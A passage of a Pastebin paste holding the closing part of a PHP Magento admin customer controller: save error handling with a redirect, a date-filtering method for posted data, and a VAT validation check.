  973. } catch (Mage_Core_Exception $e) {
  974. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  975. ->addError($e->getMessage());
  976. } catch (Exception $e) {
  977. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  978. ->addException($e, $this->__('Cannot save the customer.'));
  979. }
  980. }
  981.  
  982. $this->_redirect('*/*/edit');
  983. }
  984.  
  985. /**
  986. * Filtering posted data. Converting localized data if needed
  987. *
  988. * @param array
  989. * @return array
  990. */
  991. protected function _filterPostData($data)
  992. {
  993. $data = $this->_filterDates($data, array('dob'));
  994. return $data;
  995. }
  996.  
  997. /**
  998. * Check whether VAT ID validation is enabled
  999. *
  1000. * @param Mage_Core_Model_Store|string|int $store
  1001. * @return bool
  1002. */
  1003. protected function _isVatValidationEnabled($store = null)
  1004. {
  1005. return $this->_getHelper('customer/address')->isVatValidationEnabled($store);
  1006. }
  1007. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!